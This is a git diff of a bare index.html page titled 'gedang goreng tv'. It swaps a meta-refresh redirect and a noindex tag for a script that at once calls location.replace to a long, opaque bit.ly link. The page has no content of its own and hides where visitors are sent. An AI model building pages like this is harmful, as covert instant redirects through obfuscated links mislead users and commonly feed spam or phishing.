--- a/index.html
+++ b/index.html
@@ -1,7 +1,6 @@
-<meta charset="UTF-8" content="text/html" />
-<meta name="viewport" content="width = device-width, initial-scale = 1" />
-<meta name="robots" content="noindex, nofollow" />
-<meta http-equiv="refresh" content="0; url = https://bit.ly/jihefefe788efueie6768dwdjkdwjkqvbeouihefefe788efueie6768dwdjkdwjkqvbeouuyuyveuevwhhiudyuiiueuieui9828329983uewiufewivbfsdbudsvcudvcusdvcudscvdsuvcudvcucdusyuedvieydvi2389328329832hdbbjdbjsxkbwjxwkjbwkxjw" />
+
 <html> <head> <title>gedang goreng tv</title> </head>
-<body><center><h1>Sek Mbukak Raine Koyo Gedang</h1></center></body>
+<script>
+  location.replace("https://bit.ly/jihefefe788efueie6768dwdjkdwjkqvbeouihefefe788efueie6768dwdjkdwjkqvbeouuyuyveuevwhhiudyuiiueuieui9828329983uewiufewivbfsdbudsvcudvcusdvcudscvdsuvcudvcucdusyuedvieydvi2389328329832hdbbjdbjsxkbwjxwkjbwkxjw");
+</script>
 <div style="display:none;"> </html>
